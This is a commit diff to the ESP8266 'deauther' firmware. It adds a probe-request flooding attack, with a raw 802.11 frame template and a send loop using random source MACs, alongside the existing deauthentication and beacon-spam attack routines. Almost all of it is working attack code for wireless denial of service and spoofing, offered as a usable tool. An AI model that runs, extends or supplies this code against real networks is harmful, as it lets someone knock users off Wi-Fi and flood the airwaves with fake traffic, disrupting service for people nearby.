SpacehuhnTech
diff --git a/‎esp8266_deauther/Attack.cpp‎
Lines changed: 64 additions & 14 deletions b/‎esp8266_deauther/Attack.cpp‎
Lines changed: 64 additions & 14 deletions
diff --git a/‎esp8266_deauther/Attack.h‎
Lines changed: 16 additions & 2 deletions b/‎esp8266_deauther/Attack.h‎
Lines changed: 16 additions & 2 deletions
@@ -5,7 +5,7 @@ Attack::Attack(){
 }
 
 void Attack::generate(){
-  if(debug) Serial.print("generating Macs...");
+  if(debug) Serial.print("\n generating Macs...");
 
   Mac _randomBeaconMac;
   uint8_t _randomMacBuffer[6];
@@ -80,6 +80,24 @@ void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
 
 }
 
+void Attack::buildProbe(String _ssid, Mac _mac){
+  int len = _ssid.length();
+  if(len > 32) len = 32;
+  packetSize = 0;
+
+  for(int i=0;i<sizeof(probePacket);i++) packet[packetSize+i] = probePacket[i];
+  packetSize += sizeof(probePacket);
+
+  for(int i=0;i<6;i++) packet[10+i] = _mac._get(i);
+
+  packet[packetSize] = len;
+  packetSize++;
+  
+  for(int i=0;i<len;i++) packet[packetSize+i] = _ssid[i];
+  packetSize += len;
+  
+}
+
 bool Attack::send(){
   if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
     /*
@@ -101,7 +119,7 @@ void Attack::run(){
 
   /* =============== Deauth Attack =============== */
   if(isRunning[0] && currentMillis-prevTime[0] >= 1000){
-    if(debug) Serial.print("running "+(String)attackNames[0]+" attack");
+    if(debug) Serial.print("running "+(String)attackNames[0]+" attack...");
     prevTime[0] = millis();
 
     for(int a=0;a<apScan.results;a++){
@@ -150,7 +168,7 @@ void Attack::run(){
 
   /* =============== Beacon clone Attack =============== */
   if(isRunning[1] && currentMillis-prevTime[1] >= 100){
-    if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
+    if(debug) Serial.print("running "+(String)attackNames[1]+" attack...");
     prevTime[1] = millis();
 
     for(int a=0;a<apScan.results;a++){
@@ -193,7 +211,7 @@ void Attack::run(){
       generate();
       macListChangeCounter = 0;
     }
-    if(debug) Serial.println(" done ");
+    if(debug) Serial.println(" done");
     if(settings.attackTimeout > 0){
       attackTimeoutCounter[1]++;
       if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1);
@@ -202,7 +220,7 @@ void Attack::run(){
 
   /* =============== Beacon list Attack =============== */
   if(isRunning[2] && currentMillis-prevTime[2] >= 100){
-    if(debug) Serial.print("running "+(String)attackNames[2]+" attack");
+    if(debug) Serial.print("running "+(String)attackNames[2]+" attack...");
     prevTime[2] = millis();
 
     for(int a=0;a<ssidList.len;a++){
@@ -216,17 +234,41 @@ void Attack::run(){
 
     stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
     packetsCounter[2] = 0;
-    /*macListChangeCounter++;
+    macListChangeCounter++;
     if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){
       generate();
       macListChangeCounter = 0;
-    }*/
-    if(debug) Serial.println("done");
+    }
+    if(debug) Serial.println(" done");
     if(settings.attackTimeout > 0){
       attackTimeoutCounter[2]++;
       if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
     }
   }
+
+  /* =============== Probe Request Attack =============== */
+  if(isRunning[3] && currentMillis-prevTime[3] >= 1000){
+    if(debug) Serial.print("running "+(String)attackNames[3]+" attack...");
+    prevTime[3] = millis();
+    
+    for(int a=0;a<ssidList.len;a++){
+      buildProbe(ssidList.get(a), beaconAdrs._get(a));
+      if(send()) packetsCounter[3]++;
+    }
+    
+    stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";
+    packetsCounter[3] = 0;
+    macListChangeCounter++;
+    if(macListChangeCounter >= macChangeInterval && macChangeInterval > 0){
+      generate();
+      macListChangeCounter = 0;
+    }
+    if(debug) Serial.println("done");
+    if(settings.attackTimeout > 0){
+      attackTimeoutCounter[3]++;
+      if(attackTimeoutCounter[3] > settings.attackTimeout) stop(3);
+    }
+  }
 
 }
 
@@ -239,15 +281,23 @@ void Attack::start(int num){
     prevTime[num] = millis();
     attackTimeoutCounter[num] = 0;
     refreshLed();
-    if(debug) Serial.println("starting "+(String)attackNames[num]+" attack");
-    if(num == 1 && isRunning[2]) stop(2);
-    else if(num == 2 && isRunning[1]) stop(1);
+    if(debug) Serial.println("starting "+(String)attackNames[num]+" attack...");
+    if(num == 1){
+      stop(2);
+      stop(3);
+    } else if(num == 2){
+      stop(1);
+      stop(3);
+    } else if(num == 3){
+      stop(1);
+      stop(2);
+    }
   }else stop(num);
 }
 
 void Attack::stop(int num){
   if(isRunning[num]){
-    if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
+    if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack...");
     isRunning[num] = false;
     stati[num] = "ready";
     prevTime[num] = millis();
@@ -265,7 +315,7 @@ String Attack::getResults(){
   for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
 
   if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
-  if(ssidList.len < 1) stati[2] = "no SSID";
+  if(ssidList.len < 1) stati[2] = stati[3] = "no SSID";
 
   int _selected;
   String json = "{ \"aps\": [";
@@ -311,7 +361,7 @@ String Attack::getResults(){
   json += "}";
   if(debug){
     Serial.println(json);
-    Serial.println("done ");
+    Serial.println("done");
   }
   return json;
 }
 
@@ -14,7 +14,7 @@ extern "C" {
 #include "Settings.h"
 #include "SSIDList.h"
 
-#define attacksNum 3
+#define attacksNum 4
 #define macListLen 64
 #define macChangeInterval 4
 
@@ -43,10 +43,11 @@ class Attack
 
     void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
     void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
+    void buildProbe(String _ssid, Mac _mac);
     bool send();
 
     //attack declarations
-    const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
+    const String attackNames[attacksNum] = {"deauth", "beacon (clone)", "beacon (list)", "probe request"};
 
     //attack infos
     String stati[attacksNum];
@@ -107,6 +108,19 @@ class Attack
       0x00, 0x00 //RSN capabilities
     };
 
+    uint8_t probePacket[25] = {
+      /*  0 - 1  */ 0x40, 0x00,                         //Type: Probe Request
+      /*  2 - 3  */ 0x00, 0x00,                         //Duration: 0 microseconds
+      /*  4 - 9  */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //Destination: Broadcast
+      /* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //Source: random MAC
+      /* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //BSS Id: Broadcast
+      /* 22 - 23 */ 0x00, 0x00,                         //Sequence number (will be replaced by the SDK)
+      /*    24   */ 0x00                                //Tag Number: SSID parameter set (0)
+      /*           ,0x06,                              //Tag length
+                    0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA //SSID
+       */
+    };
+
     int macListChangeCounter = 0;
     int attackTimeoutCounter[attacksNum];
     int channels[macListLen];